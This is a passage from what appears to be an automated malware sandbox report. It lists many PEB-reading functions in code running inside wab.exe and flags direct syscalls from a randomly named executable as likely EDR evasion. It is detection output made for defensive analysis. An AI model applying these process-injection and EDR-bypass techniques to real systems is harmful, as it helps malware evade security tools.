        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474F7AF mov eax, dword ptr fs:[00000030h]12_2_2474F7AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474F7AF mov eax, dword ptr fs:[00000030h]12_2_2474F7AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474F7AF mov eax, dword ptr fs:[00000030h]12_2_2474F7AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474F7AF mov eax, dword ptr fs:[00000030h]12_2_2474F7AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474F7AF mov eax, dword ptr fs:[00000030h]12_2_2474F7AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247497A9 mov eax, dword ptr fs:[00000030h]12_2_247497A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246ED7B0 mov eax, dword ptr fs:[00000030h]12_2_246ED7B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477F78A mov eax, dword ptr fs:[00000030h]12_2_2477F78A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24795060 mov eax, dword ptr fs:[00000030h]12_2_24795060
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov ecx, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EC073 mov eax, dword ptr fs:[00000030h]12_2_246EC073
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476705E mov ebx, dword ptr fs:[00000030h]12_2_2476705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476705E mov eax, dword ptr fs:[00000030h]12_2_2476705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C2050 mov eax, dword ptr fs:[00000030h]12_2_246C2050
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EB052 mov eax, dword ptr fs:[00000030h]12_2_246EB052
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478903E mov eax, dword ptr fs:[00000030h]12_2_2478903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478903E mov eax, dword ptr fs:[00000030h]12_2_2478903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478903E mov eax, dword ptr fs:[00000030h]12_2_2478903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478903E mov eax, dword ptr fs:[00000030h]12_2_2478903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BA020 mov eax, dword ptr fs:[00000030h]12_2_246BA020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BC020 mov eax, dword ptr fs:[00000030h]12_2_246BC020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE016 mov eax, dword ptr fs:[00000030h]12_2_246DE016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE016 mov eax, dword ptr fs:[00000030h]12_2_246DE016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE016 mov eax, dword ptr fs:[00000030h]12_2_246DE016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE016 mov eax, dword ptr fs:[00000030h]12_2_246DE016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247020F0 mov ecx, dword ptr fs:[00000030h]12_2_247020F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C80E9 mov eax, dword ptr fs:[00000030h]12_2_246C80E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BA0E3 mov ecx, dword ptr fs:[00000030h]12_2_246BA0E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E50E4 mov eax, dword ptr fs:[00000030h]12_2_246E50E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E50E4 mov ecx, dword ptr fs:[00000030h]12_2_246E50E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BC0F0 mov eax, dword ptr fs:[00000030h]12_2_246BC0F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247950D9 mov eax, dword ptr fs:[00000030h]12_2_247950D9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247420DE mov eax, dword ptr fs:[00000030h]12_2_247420DE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov ecx, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov ecx, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov ecx, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov ecx, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E90DB mov eax, dword ptr fs:[00000030h]12_2_246E90DB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247860B8 mov eax, dword ptr fs:[00000030h]12_2_247860B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247860B8 mov ecx, dword ptr fs:[00000030h]12_2_247860B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C208A mov eax, dword ptr fs:[00000030h]12_2_246C208A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BD08D mov eax, dword ptr fs:[00000030h]12_2_246BD08D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F909C mov eax, dword ptr fs:[00000030h]12_2_246F909C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C5096 mov eax, dword ptr fs:[00000030h]12_2_246C5096
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246ED090 mov eax, dword ptr fs:[00000030h]12_2_246ED090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246ED090 mov eax, dword ptr fs:[00000030h]12_2_246ED090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24759179 mov eax, dword ptr fs:[00000030h]12_2_24759179
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF172 mov eax, dword ptr fs:[00000030h]12_2_246BF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B9148 mov eax, dword ptr fs:[00000030h]12_2_246B9148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B9148 mov eax, dword ptr fs:[00000030h]12_2_246B9148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B9148 mov eax, dword ptr fs:[00000030h]12_2_246B9148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B9148 mov eax, dword ptr fs:[00000030h]12_2_246B9148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24795152 mov eax, dword ptr fs:[00000030h]12_2_24795152
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24754144 mov eax, dword ptr fs:[00000030h]12_2_24754144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24754144 mov eax, dword ptr fs:[00000030h]12_2_24754144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24754144 mov ecx, dword ptr fs:[00000030h]12_2_24754144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24754144 mov eax, dword ptr fs:[00000030h]12_2_24754144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24754144 mov eax, dword ptr fs:[00000030h]12_2_24754144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C6154 mov eax, dword ptr fs:[00000030h]12_2_246C6154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C6154 mov eax, dword ptr fs:[00000030h]12_2_246C6154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BC156 mov eax, dword ptr fs:[00000030h]12_2_246BC156
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C7152 mov eax, dword ptr fs:[00000030h]12_2_246C7152
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F0124 mov eax, dword ptr fs:[00000030h]12_2_246F0124
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C1131 mov eax, dword ptr fs:[00000030h]12_2_246C1131
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C1131 mov eax, dword ptr fs:[00000030h]12_2_246C1131
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB136 mov eax, dword ptr fs:[00000030h]12_2_246BB136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB136 mov eax, dword ptr fs:[00000030h]12_2_246BB136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB136 mov eax, dword ptr fs:[00000030h]12_2_246BB136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB136 mov eax, dword ptr fs:[00000030h]12_2_246BB136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24780115 mov eax, dword ptr fs:[00000030h]12_2_24780115
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476A118 mov ecx, dword ptr fs:[00000030h]12_2_2476A118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476A118 mov eax, dword ptr fs:[00000030h]12_2_2476A118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476A118 mov eax, dword ptr fs:[00000030h]12_2_2476A118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476A118 mov eax, dword ptr fs:[00000030h]12_2_2476A118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E51EF mov eax, dword ptr fs:[00000030h]12_2_246E51EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C51ED mov eax, dword ptr fs:[00000030h]12_2_246C51ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F01F8 mov eax, dword ptr fs:[00000030h]12_2_246F01F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247961E5 mov eax, dword ptr fs:[00000030h]12_2_247961E5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247951CB mov eax, dword ptr fs:[00000030h]12_2_247951CB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247861C3 mov eax, dword ptr fs:[00000030h]12_2_247861C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247861C3 mov eax, dword ptr fs:[00000030h]12_2_247861C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FD1D0 mov eax, dword ptr fs:[00000030h]12_2_246FD1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FD1D0 mov ecx, dword ptr fs:[00000030h]12_2_246FD1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247711A4 mov eax, dword ptr fs:[00000030h]12_2_247711A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247711A4 mov eax, dword ptr fs:[00000030h]12_2_247711A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247711A4 mov eax, dword ptr fs:[00000030h]12_2_247711A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247711A4 mov eax, dword ptr fs:[00000030h]12_2_247711A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DB1B0 mov eax, dword ptr fs:[00000030h]12_2_246DB1B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474019F mov eax, dword ptr fs:[00000030h]12_2_2474019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474019F mov eax, dword ptr fs:[00000030h]12_2_2474019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474019F mov eax, dword ptr fs:[00000030h]12_2_2474019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474019F mov eax, dword ptr fs:[00000030h]12_2_2474019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24700185 mov eax, dword ptr fs:[00000030h]12_2_24700185
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BA197 mov eax, dword ptr fs:[00000030h]12_2_246BA197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BA197 mov eax, dword ptr fs:[00000030h]12_2_246BA197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BA197 mov eax, dword ptr fs:[00000030h]12_2_246BA197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477C188 mov eax, dword ptr fs:[00000030h]12_2_2477C188
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477C188 mov eax, dword ptr fs:[00000030h]12_2_2477C188
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B826B mov eax, dword ptr fs:[00000030h]12_2_246B826B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24701270 mov eax, dword ptr fs:[00000030h]12_2_24701270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24701270 mov eax, dword ptr fs:[00000030h]12_2_24701270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24770274 mov eax, dword ptr fs:[00000030h]12_2_24770274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C4260 mov eax, dword ptr fs:[00000030h]12_2_246C4260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C4260 mov eax, dword ptr fs:[00000030h]12_2_246C4260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C4260 mov eax, dword ptr fs:[00000030h]12_2_246C4260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478D26B mov eax, dword ptr fs:[00000030h]12_2_2478D26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478D26B mov eax, dword ptr fs:[00000030h]12_2_2478D26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E9274 mov eax, dword ptr fs:[00000030h]12_2_246E9274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477B256 mov eax, dword ptr fs:[00000030h]12_2_2477B256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477B256 mov eax, dword ptr fs:[00000030h]12_2_2477B256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F724D mov eax, dword ptr fs:[00000030h]12_2_246F724D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B9240 mov eax, dword ptr fs:[00000030h]12_2_246B9240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B9240 mov eax, dword ptr fs:[00000030h]12_2_246B9240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C6259 mov eax, dword ptr fs:[00000030h]12_2_246C6259
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BA250 mov eax, dword ptr fs:[00000030h]12_2_246BA250
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B823B mov eax, dword ptr fs:[00000030h]12_2_246B823B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24795227 mov eax, dword ptr fs:[00000030h]12_2_24795227
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F7208 mov eax, dword ptr fs:[00000030h]12_2_246F7208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F7208 mov eax, dword ptr fs:[00000030h]12_2_246F7208

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtClose: Direct from: 0x77542B6C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
